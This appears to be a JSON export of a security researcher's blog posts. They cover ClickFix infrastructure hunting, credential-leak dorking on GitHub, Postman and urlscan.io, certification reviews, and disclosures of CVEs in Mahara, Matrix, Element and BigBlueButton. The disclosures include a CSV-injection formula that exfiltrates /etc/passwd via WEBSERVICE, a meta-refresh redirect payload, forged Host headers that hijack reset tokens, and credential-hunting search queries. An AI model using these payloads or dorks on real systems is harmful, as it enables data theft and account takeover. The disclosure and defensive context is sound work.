[{"content":"Almost a year after my last ClickFix post, ClickFix continues to be all the rage and remains a technique of choice for initial access among many threat actors. ClickFix has since evolved from solving CAPTCHA and error prompts to impersonating documentation for products such as Claude Code, Mac storage cleaning guides, and malicious instructions via Medium blogs, among many other lures. This post will look at how a single ClickFix domain can be used to help discover many others.\nStarting with a known ClickFix domain, claude-code-macos[.]com, we can see it is typically advertised via Google Ads, as shown in the screenshot below:\nIf we now navigate to the Google Ads Transparency Center, we can search for ads across Google based on a given domain name. If we enter the ClickFix domain mentioned earlier and select “Ads in anywhere,” we are presented with the results below:\nClicking the domain name shows that three companies are paying to boost or advertise this domain via Google Ads. All of these companies are also marked as “Verified,” as shown in the screenshot below:\nIf we now click one of the companies, such as “LLT Group Incorporated,” we can view all of the ads they are paying for:\nAs highlighted in the previous image, we can now see several adverts that this company is paying for, including Claude Code lures across Grammarly and Kimi.\nThese may be Google Ads accounts that have been compromised and are being used by threat actors to publish malicious Claude Code lures, or they may be dummy companies created by threat actors. Regardless of how the Google Ads account is being abused, this vector allows us to pivot from one ClickFix domain to several others. This can be a useful technique for proactive threat hunting in defensive operations (e.g., blocking malicious domains across a corporate fleet) and for brand abuse investigations (e.g., reporting domain takedowns via trademark impersonation to better protect customers).\nAs with any investigative technique like the one outlined in this post, there are important caveats to consider. It should never be assumed that this approach provides complete coverage of all domains operated by a threat actor. One known visibility gap is that if Google removes an advert or domain in response to an abuse report, it may no longer appear in the Google Ads Transparency Center. This can impact defensive investigations, particularly when correlating activity such as DNS requests to determine whether a user has interacted with other ClickFix domains under a threat actor’s control.\n","permalink":"/blog/clickfix-google-ads-discovery/","summary":"Almost a year after my last ClickFix post, ClickFix continues to be all the rage and remains a technique of choice for initial access among many threat actors. ClickFix has since evolved from solving CAPTCHA and error prompts to impersonating documentation for products such as Claude Code, Mac storage cleaning guides, and malicious instructions via Medium blogs, among many other lures. This post will look at how a single ClickFix domain can be used to help discover many others.","title":"One Click(Fix) To Rule Them All, One Click(Fix) To Find Them"},{"content":"What is ClickFix? ClickFix is a social engineering technique increasingly being used by actors in the past few months. The technique relies on fooling users to run PowerShell or Terminal commands on their computers, through the use of fake error dialogue boxes. This post will look at how the domains involved in ClickFix script can be latched onto to discover additional infrastructure. The ClickFix script in this case was used to download the SectopRAT malware, you can read more about the malware itself on my friend Chris\u0026rsquo;s blog here.\nOur entry point for this campaign is cloudtechburner[.]com (recording below). When interacted with, the page fetches the ClickFix embed/payload from forfsakencoilddxga[.]com. We will now look at how forfsakencoilddxga[.]com can be latched onto to find other potential domains part of the ClickFix infrastructure for this campaign.\nLooking up our first hop (forfsakencoilddxga[.]com) on VirusTotal, we can see that it has nameserver values for Cloudflare. Cloudflare in some cases issues the same set of nameservers to zones in an account. Therefore, we can try to use a stab in the dark technique to try find other domains that belong to the same Cloudflare account. Generally, a set of nameservers on its own is not enough, and you need other correlations to establish a high level of confidence to say that domains are operating behind the same Cloudflare account.\nUsing the following search term in VirusTotal entity:domain ns:cleo.ns.cloudflare.com ns:leah.ns.cloudflare.com, we are telling VirusTotal to give us all domains where they have nameserver values of cleo.ns.cloudflare.com and leah.ns.cloudflare.com. We get 95 unique domains (as shown in the screenshot below). The reason we see 95 domains is because Cloudflare has roughly 900 nameservers, resulting in ~810,000 unique combinations of nameserver records, which means that different accounts or zones can get the same set of nameserver records.\nInterestingly, the very second domain we see in our search term is caprofklfkzttripwith[.]com. The domain was registered on the same date as our first hop, has the same registrar as our first hop (hello.co) and of course the same set of nameservers. For now, let\u0026rsquo;s call this a low to moderate probability of these domains being related and dig into it further. If we then expand our VirusTotal search to look for this specific registrar, we end up with the four domains below.\n\u0026ldquo;Lets get this out onto a tray.\u0026rdquo; ~ Steve1989MREInfo\nBy inserting the four discovered domains into VirusTotal Graph, we start to build an image of what\u0026rsquo;s going on. Specifically, we start to see an overlap in malicious and downloaded file detections, domain registrar, domain creation date, DNS records and cross-domain file interactions.\nBased on the information we discovered, we can establish that it\u0026rsquo;s highly probable that these four domains are under the same Cloudflare account, are controlled by the same entity and are part of the same campaign. To discover what each domain does and how it all ties together into the bigger picture, head on over to Chris\u0026rsquo;s blog!\n","permalink":"/blog/clickfix-infrastructure-discovery/","summary":"What is ClickFix? ClickFix is a social engineering technique increasingly being used by actors in the past few months. The technique relies on fooling users to run PowerShell or Terminal commands on their computers, through the use of fake error dialogue boxes. This post will look at how the domains involved in ClickFix script can be latched onto to discover additional infrastructure. The ClickFix script in this case was used to download the SectopRAT malware, you can read more about the malware itself on my friend Chris\u0026rsquo;s blog here.","title":"A Game Of Probabilities | Discovering ClickFix Infrastructure"},{"content":"Google Meet, Microsoft Teams and Zoom are all examples of common conferencing software used across large companies - companies that are large enough to be a juicy target for threat actors located in sanctioned countries. These actors, often just tech-savvy average joes, seek to get ahead by earning a US tech company salary. While their intent may not inherently be malicious, deception and fraud in getting the job can pose a reputational and legal risk to companies. This blog will cover how video conferencing software logs can be used to locate these threats.\nTo get the information from your conferencing tool of choice, you likely need a level of privileged access, which will vary from platform to platform. Using Zoom as an example, this support page lists where the information we are after is located. Specifically, a field called Speaker is present in meeting details, as shown in the screenshot below.\nActors are often observed using a laptop-farm type setup, where they use a computer in their home country to connect to a laptop located in the country they are pretending to live in. If proper OPSEC is not observed by actors or they have a lapse in situational awareness (e.g., joining a Zoom meeting invite from origin device), these logs can help reveal their true location.\nAn example of a Speaker field log that would be interesting in such cases is GDM-245JN. When we research this model number, we see that various Iran-based sites are present in the results (screenshot below). The device in this case is a computer monitor, which has been selected as the audio output device by the actor. We can assess with high confidence that the device is primarily sold in Iran, and due to the trade embargos, it is unlikely for this specific model number to be naturally present in countries which many firms can operate from.\nIn an ideal world, a repository or data source of model-number-to-geographic-location relation would help in creating an automated detection. At the time of writing, I am not aware of a source that provides this reliably for speaker and/or monitor model numbers, and manual research is required to confirm whether this is a useful indicator for a given instance. The technique detailed in the blog above can be used to conduct Threat Hunts and/or to add enrichment to existing suspects.\n","permalink":"/blog/trace-that-sound/","summary":"Google Meet, Microsoft Teams and Zoom are all examples of common conferencing software used across large companies - companies that are large enough to be a juicy target for threat actors located in sanctioned countries. These actors, often just tech-savvy average joes, seek to get ahead by earning a US tech company salary. While their intent may not inherently be malicious, deception and fraud in getting the job can pose a reputational and legal risk to companies.","title":"Trace That Sound"},{"content":"Dotfiles Backup, for the context of this blog is a framework/methodology/concept. It is a collection of files, often starting with dots (as the name implies) where users (developers, system admins, etc) store their personalised configurations for a variety of software. These collections are often pushed to a git repository and contain configuration files for software such as Vim, VSCode, Zsh, .aliases, git, and so on.\nA common use case for dotfiles is when users join new companies and get issued a work laptop. Often we see them clone their dotfiles repository and symlink files to apply custom configuration for their favourite software. Over time these configurations may be updated and changed, such as tokens and credentials being saved to configuration files. Eventually, the user pushes a commit to save their dotfile repository, resulting in unintended credential leakage.\nOne of the most common (and generic) ways to look for intel or credential leakage via dotfiles is to search for the presence of the string \u0026ldquo;dotfile\u0026rdquo; (i.e. path:*dotfile* on GitHub) combined with other keywords of interest. For example, we know AWS CLI is widely used and parameters for AWS Secrets tend to start with keywords like \u0026ldquo;AWS_SECRET\u0026rdquo;. Therefore, if we use a search like (path:*dotfile* OR path:*dot-file* OR \u0026quot;dotfile\u0026quot;) \u0026quot;AWS_SECRET\u0026quot; we may see some results after filtering through the noise (i.e. the result below from the 4th page). However, this approach is fairly generic and heavily limited by GitHub\u0026rsquo;s five-page search limit and inability to sort by recently updated (to name a few restrictions).\nThe real benefit comes when the search is combined with well-defined keywords. For example, in this scenario you work at a company (domain s4.nz) that is currently using Artifactory, and usernames for Artifactory are user emails (i.e. bob.jones@s4.nz). With this in mind, you could run a threat hunt with the theory that someone may be leaking Artifactory credentials through dotfiles. An example search for this may look like (path:*dotfile* OR path:*dot-file* OR \u0026quot;dotfile\u0026quot;) \u0026quot;@s4.nz\u0026quot; \u0026quot;artifactory.s4.nz\u0026quot;. These types of searches often result in two findings; One - Information an adversary could use for reconnaissance against a target company. Two - Discovery of credential leakage. While this example uses GitHub, the same logic can be applied across GitLab or Bitbucket instances.\nAt the time this post was published, I came across two main tutorials showing how to utilise dotfiles using different methodologies. The first tutorial is by Atlassian, using a config-based approach to manage dotfiles. This tutorial contained no mention of security or best (security) practices. The next tutorial is a GitHub Pages site maintained by a community, the site is thorough and contains a mention in the FAQ page on how to remove sensitive data (but unfortunately no mentions of security or best practices otherwise).\nI am a firm believer that to make someone do something, you have to explain the why (i.e. educate them). It’s likely that when these tutorials are being followed; the consumers of these may not have security in front of mind, or an understanding of the risks associated with following tutorials that you don’t understand completely. A small section on security or security hygiene can go a long way, especially when new members of the industry are following these tutorials. Managing security risks should always be about \u0026ldquo;Yes\u0026hellip;but XYZ condition\u0026rdquo; instead of a straight \u0026ldquo;No\u0026rdquo;. With that in mind; \u0026ldquo;Yes, we can have dotfiles stored in a publicly accessible repository, but users need to be aware of the risks and should utilise secret scanning\u0026rdquo;.\n","permalink":"/blog/dotfiles/","summary":"Dotfiles Backup, for the context of this blog is a framework/methodology/concept. It is a collection of files, often starting with dots (as the name implies) where users (developers, system admins, etc) store their personalised configurations for a variety of software. These collections are often pushed to a git repository and contain configuration files for software such as Vim, VSCode, Zsh, .aliases, git, and so on.\nA common use case for dotfiles is when users join new companies and get issued a work laptop.","title":"Dotfiles Backup - A Treasure Trove"},{"content":"Have you ever been in a situation where you are managing a large number of users and one of them has committed sensitive information to a repository on GitHub? The issue is exaggerated even more when the username is ambiguous, the .patch file does not have any helpful information and generally, no solid details are present to find out who made the commit.\nDepending on how your organisation works, you may be able to use .key files! If a user has uploaded an SSH keypair to GitHub, you can find out their public SSH keys by appending .keys to the end of their username. For example, if we take Linus Torvalds, their GitHub profile is https://github.com/torvalds, and after appending .keys, we can see they have a key pair located at https://github.com/torvalds.keys.\nWith the public key we just obtained, we can now enumerate sources to see if the same key exists in internal records. For example, key pairs on bastion servers, internal git instances and any other tool which allows you to easily enumerate through public key pairs. If you get a match, this should hopefully allow you to close in on the culprit.\nI do want to note that this technique is a last-case resort and other easier methods should be tried first. The use case detailed here is super specific and only works if you have a record of public keys for your users, and if the user in question has re-used the same SSH key pair.\n","permalink":"/blog/github-keys-tracking/","summary":"Have you ever been in a situation where you are managing a large number of users and one of them has committed sensitive information to a repository on GitHub? The issue is exaggerated even more when the username is ambiguous, the .patch file does not have any helpful information and generally, no solid details are present to find out who made the commit.\nDepending on how your organisation works, you may be able to use .","title":"Tracking via GitHub Keys"},{"content":"Postman is an API platform for developers to design, build and test their APIs. The platform allows users to work in teams and organizations, giving users the option to share their workspace over the Internet. One of the features includes the ability to organize requests (GET, POST, PATCH, etc) on different \u0026lsquo;pages\u0026rsquo;, with the option to define request parameters, headers, authorization, body and tests. The issue at hand comes into play when request parameters are directly populated with values such as passwords, API tokens and secrets, combined with a workspace which has been shared publicly.\nIn order to find these workspaces, we use one of the best tools there is; Google Search. In the example below, I am using the \u0026lsquo;site\u0026rsquo; search operator combined with a target. The target in my case is all New Zealand based sites with domain ending \u0026ldquo;co.nz\u0026rdquo;, but in your case, it could be a company, tool or platform.\nAs we can see in the screenshot above, we get a variety of workspaces. Not all workspaces will leak information, but in my experience (combined with the right Google Search), most ended up containing some form of unintended disclosure (ranging from PII to service credentials). Exploring one of the entries, as shown in the screenshots below, we can see the password has been leaked for a Gmail account, as well as, authorization token for an endpoint.\nAdditionally, if a workspace was once public, but has since been made private, remember to check out Google Search cache. Clicking the \u0026lsquo;View source\u0026rsquo; button on webcache.googleusercontent.com for the Postman link in question can reveal the token/password/credential, if the value was once accessible.\nThis technique can be used for non-interactive reconnaissance to gather and harvest credentials which have been leaked accidently. In some cases, the workspace visibility can be enforced at an organisation level, to try prevent this from happening, though developers still have the ability to spin up their own standalone workspace. A simple, yet solution to educate developers and users who use Postman for their day-to-day activities.\n","permalink":"/blog/postman-credentials/","summary":"Postman is an API platform for developers to design, build and test their APIs. The platform allows users to work in teams and organizations, giving users the option to share their workspace over the Internet. One of the features includes the ability to organize requests (GET, POST, PATCH, etc) on different \u0026lsquo;pages\u0026rsquo;, with the option to define request parameters, headers, authorization, body and tests. The issue at hand comes into play when request parameters are directly populated with values such as passwords, API tokens and secrets, combined with a workspace which has been shared publicly.","title":"Credential Harvesting via Postman"},{"content":"urlscan.io is a free and paid tool that is used to scan and analyse URLs. The tool is often used by Security Analysts and employees working in a SOC. It is also available as an integration add-on in several popular security toolings such as Splunk SOAR and Cortex XSOAR. This post will be focusing on the Search functionality in urlscan.io and how it can be abused to extract sensitive content due to tooling misconfigurations or accidental information leakage.\nFirst, a small explanation on how search works on urlscan.io. On the home page, the default scan option is a \u0026lsquo;Public Scan\u0026rsquo;. What this means is that any URL submitted on the platform will be searchable by anyone on the Internet. Just like Google Dorking, the search functionality has filters which can be utilised to drill down to specific type of results. Fairly simple so far right, who\u0026rsquo;s gonna put sensitive link on a public scan? Well, that\u0026rsquo;s where the issue comes in, in specific, two use cases to consider.\nUse case one: Manual submissions. Consider the screenshot below, there are two main properties to note, submitted URL and effective URL. A user has submitted a short link from their Vodafone Rewards site (submitted URL), which has then redirected to a unique URL (effective URL) containing a free movie ticket. This information is now available on the Internet for anyone to use, unless the user gets this removed from urlscan.io (unlikely that the user is aware of the scan being public in first place).\nThe result above (ensured expired at the time of publish) was discovered using the following search filter:\npage.domain:\u0026#34;nz\u0026#34; AND page.url:\u0026#34;voucher\u0026#34; Additionally, consider this scenario: A SOC Analyst is in a hurry and trying to analyse a URL, which was present in a potential phish to an executive. Unknown to the analyst, the link is legitimate and redirects to a unique site with sensitive information on it. The analyst then Googles for a URL scanning tool and lands on urlscan.io home page, which has an inviting wide search bar and a big green button. They then quickly enters the URL in the search bar and press enter, which has now resulted in an unintended information leakage due to the analyst not paying close attention. While the analyst is at fault here, is not helped by a lack of warning or confirmation before the public scans are submitted.\nHere is another example where a password reset link has been made available for anyone to use, using an adapted search filter from above: page.domain:\u0026ldquo;nz\u0026rdquo; AND page.url:\u0026ldquo;reset\u0026rdquo;.\nThis technique can be adapted to search for password reset links, PDF invoices with personal details and endless other use cases that rely on unique URLs. Sensitive public submissions have been observed from various large corporations and government agencies, so not something that is limited to small shops. Sometimes it’s the end user submitting these links themselves, as opposed to a Security Analyst or someone reviewing a phish.\nYou can also further expand this technique with file hashes. For example, a phishing kit might be using the same CSS file across its deployment. You can get SHA256 hash of the CSS file and search urlscan.io for that hash in order to see submissions with that phishing kit. The same technique can be used against off the shelf software deployments, i.e. if WordPress password reset pages were using the same core CSS file, we can use the CSS file hash to find submissions that have exposed their password reset links.\nUse case two: Misconfigured tooling, either due to lack of knowledge or budget. Using Cortex XSOAR urlscan.io integration as an example, the configuration field for scan type selected by default is \u0026lsquo;Public\u0026rsquo; and unless an engineer is specifically changing that (or an analyst running the command with private parameter), the results are going to be searchable using the methods above. Note that this behavior may have changed with the updated version or no longer applicable with deprecated commands. Additionally, some smaller shops do not have the budget for Pro version of urlscan.io and default to free tier public for operational needs, in order to not hit the free tier limits imposed by other scan types.\nThis post is intended for educational purposes and the techniques mentioned here can be utilised by analysts or TI team members to search for information leakage against their own organisation domains.\n","permalink":"/blog/urlscan-dorking/","summary":"urlscan.io is a free and paid tool that is used to scan and analyse URLs. The tool is often used by Security Analysts and employees working in a SOC. It is also available as an integration add-on in several popular security toolings such as Splunk SOAR and Cortex XSOAR. This post will be focusing on the Search functionality in urlscan.io and how it can be abused to extract sensitive content due to tooling misconfigurations or accidental information leakage.","title":"urlscan.io Dorking"},{"content":"Blue Team Level 1 is a certification offered by Security Blue Team. The certification is aimed at entry to junior level roles and consists of six primary domains. At the time of writing the cost for the certification was roughly NZ$800, which included access to training material for 4 months and 100 hours of access to a lab environment.\nThe training went over Security Fundamentals, Phishing Analysis, Threat Intelligence, Digital Forensics, Security Information and Event Management, and Incident Response. So, definitely a lot of useful content is being covered. I enjoyed the Phishing Analysis and Incident Response modules, they introduced some new tools and methodologies that I was previously unaware of (even after two years of SOC experience), so there is definitely knowledge to be gained for all experience levels.\nSome things that could be worked on are the lab environments and the 30 days wait time for the exam results. At the time I did my training, some of the labs were unavailable and the instructions were not that clear on how to access the unavailable content. Additionally, the 30 days wait time for the exam results leaves the user in limbo, as I wasn\u0026rsquo;t sure if I should start studying for another certification or continue studying BTL1 content (in case I didn\u0026rsquo;t receive enough marks). Saying that, I have been told that these issues will be addressed with the new platform releasing sometime in 2022.\nThe exam was 24 hours long, with 12 hours of lab time and additional 12 hours to finish the report. The exam template can be accessed at any time during the training and I strongly recommend going over the template thoroughly, before starting the exam (so that you have a plan of attack in place). I was able to complete the exam and the report within 10 hours, so the time provided is pretty generous. Due to the NDA, I can\u0026rsquo;t provide more information about the exam, but a key takeaway is: don\u0026rsquo;t underestimate it, especially if you are new to the field.\nAfter 27 days, I received an email from Security Blue Team informing me that I have passed with Gold (90%+). Even though I passed with Gold, the results email also contained exam feedback on what went well and what could be done better (which clearly shows that the SBT team is invested in improving and developing their students).\n","permalink":"/blog/btl1/","summary":"Blue Team Level 1 is a certification offered by Security Blue Team. The certification is aimed at entry to junior level roles and consists of six primary domains. At the time of writing the cost for the certification was roughly NZ$800, which included access to training material for 4 months and 100 hours of access to a lab environment.\nThe training went over Security Fundamentals, Phishing Analysis, Threat Intelligence, Digital Forensics, Security Information and Event Management, and Incident Response.","title":"Blue Team Level 1 Review"},{"content":"Mahara is an electronic portfolio system that is used as an eLearning tool by education institutions around the globe. The software contains the ability to export records from the system into a CSV file. This blog will cover how that functionality can be abused (when inputs are not escaped correctly), to conduct local command execution (aka CSV injection).\nFor this demonstration, two accounts will be used. The first account will be the malicious actor where CSV injection payloads are saved into editable inputs. The second account will be the victim/system administrator with the ability to export data as CSV from the application.\nWe will first log in with the student account, aka the malicious actor in this demonstration, to set the payload. The student account can update their profile details, such as the first and last name. We will use this input as the vector for injecting our example payload shown below:\n=\u0026#39;file:///etc/passwd\u0026#39;#$passwd.A1 After the profile is saved, the payload is set and no other action is required from the malicious actor. Note: for this injection to be successful, the victim needs to have a CSV processing application that provides minimal or no warning before command/formula execution. In a nutshell, luck and naive human interaction play a big part in this to be successful.\nWe will now log into our victim account, aka system administrator. After logging in, click on the wrench icon on the top right, followed by \u0026lsquo;People search\u0026rsquo; under the \u0026lsquo;People\u0026rsquo; category. Then select all users or specific ones, and click \u0026lsquo;Get reports for the selected accounts\u0026rsquo;. After that, you will be redirected to the page shown below, where clicking the download button presents the CSV file.\nWhen the CSV file is opened, there are two possible outcomes. First option: The user is prompted with a warning or the ability to open the file is denied. This is the likely result with most modern applications and operating systems. The other option: There is no warning presented to the user and the file opens, or a warning is presented and the user decides to open the file anyways without reading the warnings (while unlikely, it does happen).\nAssuming that the file has successfully opened and/or the warnings have been ignored, the payload will trigger the injected formula. In the example above, a cell is simply populated with the file /etc/passwd content. What if we wanted to do more than that and steal data to a remote server? We can use a payload like the one below:\n=WEBSERVICE(CONCATENATE(\u0026#34;http://127.0.0.1:8000/\u0026#34;,(\u0026#39;file:///etc/passwd\u0026#39;#$passwd.A1))) The payload above is essentially sending a GET request and it appends the value of the provided file/cell as a GET request parameter, which leads to data exfiltration from the victim\u0026rsquo;s device. In the screenshot below, we can see that GET requests are being received with content from /etc/passwd file, on a local webserver.\nData exfiltration is one possible technique that can be used, countless other approaches can be utilised.\nThis issue was reported to the Mahara team in early 2021, while I was working at Catalyst IT. A fix for this was released on 28th October and CVE-2021-40848 release by MITRE on 11th November. This issue is not specific to Mahara or due to a vulnerability in the system, however, the patch released by the Mahara team helps safeguard their user base against Mahara being used as a vector of transmission.\n","permalink":"/blog/cve-2021-40848/","summary":"Mahara is an electronic portfolio system that is used as an eLearning tool by education institutions around the globe. The software contains the ability to export records from the system into a CSV file. This blog will cover how that functionality can be abused (when inputs are not escaped correctly), to conduct local command execution (aka CSV injection).\nFor this demonstration, two accounts will be used. The first account will be the malicious actor where CSV injection payloads are saved into editable inputs.","title":"CVE-2021-40848 Mahara | CSV Injection"},{"content":"eLearnSecurity Junior Penetration Tester (eJPT) is a certification offered by eLearnSecurity. The training for this certification is provided by the parent company called INE (Inter Network Experts). In order to train for eJPT, INE offers a Penetration Testing Student (PTS) pathway, free of charge, under the recently launched starter pass.\nThe training itself consists of 38 hours worth of content, including slides, videos, practical labs and three practice black boxes. Coming from HackTheBox background, I had familiarity with most of the tools and concepts offered. The networking and Windows lab content provided an assurance for my base understanding and gave an insight into how the exam would be structured.\nThe exam for this certification is entirely hands-on and consists of 20 multichoice questions. Students are provided with 72 hours to complete the exam. Tasks can include exploiting hosts and answering questions about the content on the machine. Enumeration is the key.\nIn summary, the certification offers basic application and networking concepts, as well as, an introduction to popular penetration testing tools. The certification would make a good addition for interns at penetration testing shops, where the base knowledge is fortified and built upon.\n\u0026ldquo;Remember your ABC\u0026rsquo;s: Always Be Crackin\u0026rsquo;\u0026rdquo; ~ Joshua Wright\n","permalink":"/blog/elearnsecurity-ejpt/","summary":"eLearnSecurity Junior Penetration Tester (eJPT) is a certification offered by eLearnSecurity. The training for this certification is provided by the parent company called INE (Inter Network Experts). In order to train for eJPT, INE offers a Penetration Testing Student (PTS) pathway, free of charge, under the recently launched starter pass.\nThe training itself consists of 38 hours worth of content, including slides, videos, practical labs and three practice black boxes. Coming from HackTheBox background, I had familiarity with most of the tools and concepts offered.","title":"eLearnSecurity eJPT Review"},{"content":"Matrix is an open standard and protocol for real-time communication. One of the Matrix package is a reference homeserver, known as Synapse. This means that Synapse is essentially a server that organisations and communities can run, to host and access their own Matrix server. This also means that those organisations are able to control who can sign up and access that particular server.\nTo register on a server, the portal asks for details such as name, password, and email. The email field can be restricted to a particular domain, which is enforced through a regular expression (regex). This is particularly handy for companies wanting to only allow specific people on the server. For example, if the server is run by Facebook, they may limit registration to anyone who has a @facebook.com email address.\nThis is where the bypass comes in. The regex provided in the sample/commented-out configuration file in Matrix Synapse failed to terminate the regex after the intended top-level domain (TLD). What this means is that an external actor can craft an out-of-scope domain and email address, such as the one shown below.\nDomain: facebook.com.sakshamanand.com Email: example@facebook.com.sakshamanand.com The crafted email address above will successfully validate and authenticate non-organisation actors, resulting in information leakage and other attack vectors, depending on the server configuration. Additionally, given that this issue is present in sample documentation, it is possible that a wide range of users could have copied configurations for various Synapse servers based on this file, where the regex flaw is present.\nThe issue was present in a configuration entry on line 1247 of sample_config.yaml file, known as allows_local_3pids, which was also called by another functionality in the application. A suggested fix for this regex is to terminate the string after the TLD ending, and to restrict the username part of the email address, as shown below.\nOriginal: .*@matrix\\.org Fixed: ∧[∧@]+@matrix\\.org$ I reported the issue upstream to Matrix Security on 31st March 2021, and a fix was made available by the maintainers under this pull request on the same day.\n","permalink":"/blog/matrix-synapse-regex-bypass/","summary":"Matrix is an open standard and protocol for real-time communication. One of the Matrix package is a reference homeserver, known as Synapse. This means that Synapse is essentially a server that organisations and communities can run, to host and access their own Matrix server. This also means that those organisations are able to control who can sign up and access that particular server.\nTo register on a server, the portal asks for details such as name, password, and email.","title":"Organisation Registration Bypass – Matrix Synapse"},{"content":"Element (formerly Riot and Vector) is an open source instant messaging application implemented over the Matrix protocol. Matrix is known for supporting end-to-end encryption and the application itself is available for various platforms, including Desktop, Mobile and Web. This post will only be addressing the mobile version, which contained the vulnerability at the time this was written.\nFirstly, the Android application in question is available at this link, with the code base for the application hosted here. The vulnerability in question is present in the native HTML Viewer application that Element is opening attachments with, instead of a browser, which does not correctly implement a sandbox mode, leading to Cross Site Scripting (XSS) being present via meta tag injection.\nIf a HTML attachment is uploaded to a room or chat, with a payload such as \u0026lt;meta http-equiv='refresh' content='0' URL='http://sakshamanand.com/xss.html' /\u0026gt; in the header, the built in viewer/browser functionality should be preventing scripts and plugins from executing, when the download/view attachment button is clicked. This is correctly being done on the servers, where the files are being rendered in the browsers with appropriate headers in place, as shown in screenshot below:\nHowever, if the same attachment is opened in the Android Element application, the logic first tries to render the HTML file through the native HTML Viewer, then the meta header gets accepted and the user is forwarded to the the attack vector/site via external browser, as shown in the screenshots below:\nThis is considered a low level security vulnerability as if a client of any user shares a malicious payload (especially in public Matrix channels), anyone who clicks (accidentally, or intentionally) on it can be vulnerable to a variety of attacks, including, but not limited to:\nMisleading or Automated Infected File Downloads;\nDue to human nature, a user may be in the mindset that in order to view the attachment they have to first download the file and open in. An attacker is able to name the file a user may be expecting, for example \u0026lsquo;sales_results.pdf\u0026rsquo;, if Matrix is being used in a commercial environment, and the file will be downloaded (at times without any prompt) and opened by the user. Depending on the device and it\u0026rsquo;s setting, a variety of actions can trigger; the file may automatically download and open on click, the actual extension of the file can be hidden (a user may think they are downloading a pdf file, when in fact it may be app package) and so on. The payload target can be replaced with Android Deep Link URLs, some which accept body content. For example \u0026ldquo;example://sakshamanand?data=malciousContent\u0026rdquo; can allow for stacked vulnerabilities, if the target application contains this type of behaviour. Phishing Portals \u0026amp; Techniques;\nA web page can be created with a similar domain name (for example if victim is example.com, then attacker uses example.co), where the user is prompted to login using their credentials, in order to view the \u0026ldquo;attachment\u0026rdquo; they just clicked on. Various other applicable XSS type attacks.\nThe issue above was tested with 10+ Android devices/users, and present in all instances. Additionally, this vulnerability was reported to upstream developers, on 29th October 2020, through the security policy listed on GitHub.\nUpdate 01/12/20: Matrix Security team responded regarding the issue above and mentioned that given the issue is with native HTML Viewer in Android, no action can be taken at Element application level. I believe the bug ultimately then comes due to difference in expectations from the HTML Viewer and Element Android application. Given the minor nature of this issue, publishing this article.\n","permalink":"/blog/element-unvalidated-redirect-through-html-viewer/","summary":"Element (formerly Riot and Vector) is an open source instant messaging application implemented over the Matrix protocol. Matrix is known for supporting end-to-end encryption and the application itself is available for various platforms, including Desktop, Mobile and Web. This post will only be addressing the mobile version, which contained the vulnerability at the time this was written.\nFirstly, the Android application in question is available at this link, with the code base for the application hosted here.","title":"Unvalidated Redirect HTML Viewer – Element Messenger"},{"content":"Back in April, one of the systems I was testing was a video conferencing application, known as BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton installation comes with a user friendly interface, known as Greenlight, which ties in nicely with the BigBlueButton server. While most of the corporate installations would be using LDAP authentication, at times, installation will be based on standard username and password login mechanism, which is handled by Greenlight.\nPart of the standard authentication process in Greenlight is the \u0026lsquo;Forgot Password?\u0026rsquo; functionality. Which when clicked, prompts the user for their email and presents a submit button, as shown in the screenshot below:\nFor the purpose of this demonstration \u0026lsquo;saksham@example.com\u0026rsquo; is being used as the victim\u0026rsquo;s email, however, in reality, an attacker will use the corporate email address of their victim (i.e. an executive in some company). When the form is populated and submitted, the requests can be captured through Burp Suite or through the network tab of the browser debugger. The captured request headers will show a range of different entries, including host header and origin header, as shown below:\nHost: bigbluebutton.example.com Origin: https://bigbluebutton.example.com In a real world scenario, the domain in the header will be replaced with something that looks familiar with the existing domain name that a company has. For example if a company owns \u0026rsquo;example.com\u0026rsquo;, then an attacker might register \u0026rsquo;example.co\u0026rsquo;, to increase the likelihood of a successful phishing attack. For the purpose of this demonstration, the host and the origin headers were replaced with the following entries:\nHost: www.sakshamanand.com Origin: https://www.sakshamanand.com The request was then released from the client and accepted by the server under the 302 response code. Shortly after which, an email appeared in the example inbox, as shown below:\nWhen the blue \u0026lsquo;Reset Password\u0026rsquo; button is clicked, the following link opens in the browser:\nhttps://www.sakshamanand.com/gl/password_reset/TOKEN_REDACTED/edit From here, two attacks are possible:\nThe attacker can capture the victim\u0026rsquo;s password reset token, from the link sent to the attack domain, and use it to create a random password. From which they can do damage that is contained within the BigBlueButton installation, however, this will lock the victim out of BigBlueButton and the attack may not last long.\nOr, the attacker can create a fake BigBlueButton password reset portal, something that looks exactly like the real one (combined with the almost similar domain name, example.co), then capture the new password that the victim picks. This would allow the attacker to continue using the vulnerable BigBlueButton account, without locking the victim out, and the attacker can try use the new password in other applications within the company (under the assumption that the victim might have used the same password elsewhere).\nThese attacks are generally possible in package based software, where the software is aimed at multiple consumers for self installation. The application was vulnerable to this issue as it was directly reading the headers without validating them. Generally, in order to mitigate against Host Header Injection attacks, a whitelist needs to be implemented and the code must check against that whitelist to sanitise incoming/outgoing HTTP requests.\nThis issue was reported to BigBlueButton in May 2020 and was promptly fixed by the project maintainers under this pull request. A CVE for this issue was also released by MITRE on 30th September under https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26163.\n","permalink":"/blog/host-header-injection-bigbluebutton/","summary":"Back in April, one of the systems I was testing was a video conferencing application, known as BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton installation comes with a user friendly interface, known as Greenlight, which ties in nicely with the BigBlueButton server. While most of the corporate installations would be using LDAP authentication, at times, installation will be based on standard username and password login mechanism, which is handled by Greenlight.","title":"CVE-2020-26163 BigBlueButton | Host Header Injection"},{"content":"As part of a penetration testing project at Catalyst IT, I conducted a test on an open source video conferencing system known as the BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton contains a closed captions module, that allows a user to manually type captions, and all users with captions enabled can see them at the bottom of the screen. While the ability to add captions is only restricted to moderator level permissions, this issue is exaggerated, as when the breakout room functionality is used, all users are granted moderator level permissions, allowing them to write captions.\nWhen a payload is inserted into the captions editor, it instantly triggers and appears on the screen of all users. In the screenshot below, on the left, the user has the moderator level permission and is writing the closed captions in the text pad editor. On the right, the user has a standard account with captions enabled.\nThis issue existed due to \u0026lsquo;dangerouslySetInnerHTML\u0026rsquo; being used in the React application. This issue was reported upstream and was fixed by the product owners under this pull request. The issue was also reported to MITRE on 2nd April, and following CVE was released for it accordingly on 23rd April; https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12113.\n","permalink":"/blog/cve-2020-12113/","summary":"As part of a penetration testing project at Catalyst IT, I conducted a test on an open source video conferencing system known as the BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton contains a closed captions module, that allows a user to manually type captions, 